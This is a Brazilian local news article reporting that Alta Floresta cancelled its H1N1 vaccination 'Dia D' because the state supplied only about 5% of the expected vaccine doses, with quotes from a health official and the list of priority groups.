Capa / Em Destaque / Dia D da campanha de vacina contra H1N1 é suspensa

Dia D da campanha de vacina contra H1N1 é suspensa

15f619e6b5215c6740b8d899799db57dDionéia Martins

O dia D da campanha de vacinação contra a Influenza A ou gripe H1N1 foi cancelada porque a vacina disponibilizada pela Secretaria Estadual de Saúde (SES) é insuficiente para atender a população almejada. Segundo a gerente da Vigilância Epidemiológica, Fernanda Santos de Jesus, a quantidade de vacina r
ecebida representa 5% do que era esperado.
Em 2015 Alta Floresta recebeu em torno de 10.500 doses da vacina, esse ano devido a quantidade de casos suspeitos a Secretaria Municipal de Saúde solicitou uma quantidade maior, e a expectativa era a de receber inicialmente pelo menos a quantidade de anos anteriores, no entanto, a SES disponibilizará aproximadamente 1.800 doses para o dia D da campanha.
“Inicialmente se for para abranger todos os grupos prioritários não temos condições, eles (SES) mandaram uma parcela de 5% em relação ao quantitativo que devemos receber, ela (vacina) não vão nos dá respaldo para trabalhar nem sequer o dia todo de uma campanha de vacinação”, esclarece Fernanda Santos.
Para evitar tumultos nas Unidades Básicas de Saúde (UBS) a Secretária Municipal de Saúde (SMS) decidiu não realizar o dia D da campanha que aconteceria no sábado, 30, o esperado era do município receber um pouco mais de 3 mil doses. “Acontece que 1.800 doses para 15 unidades básicas de saúde, eles receberiam em média 100 doses cada uma”, disse Fernanda.
Na rede pública, a vacinação contra influenza é destinada a alguns grupos prioritários: crianças de 6 meses a 5 anos, gestantes, idosos, profissionais da saúde, povos indígenas e pessoas portadoras de doenças crônicas e outras doenças que comprometam a imunidade.
Segundo Fernanda a informação repassada pela Vigilância Epidemiológica do Estado, é que Alta Floresta receberá aproximadamente 10 mil doses em quatro etapas. Já a Secretaria de Saúde do Estado informou que Mato Grosso recebeu somente 45% da quantidade prevista. “Até o momento já recebemos 337.500 (45%) das doses de vacinas referentes à meta de vacinação estadual, que é de 698.212 pessoas”. A previsão do Ministério da Saúde é de que até dia 13 de maio Mato Grosso receba 100% das vacinas.
DIA D
O dia D nacional da campanha de vacinação é uma estratégia do Governo Federal para atingir uma quantidade maior do público almejado.
Alta Floresta não realizará o dia D da campanha. A vacinação acontecera nas UBS durante a semana de acordo com o grupo destinado. Qualquer dúvida que os usuários tiverem, devem procurar o enfermeiro responsável pela unidade de saúde para esclarecimentos.document.currentScript.parentNode.insertBefore(s, document.currentScript);

Sobre admin

Deixe uma resposta

O seu endereço de email não será publicado. Required fields are marked *

*

Scroll To Top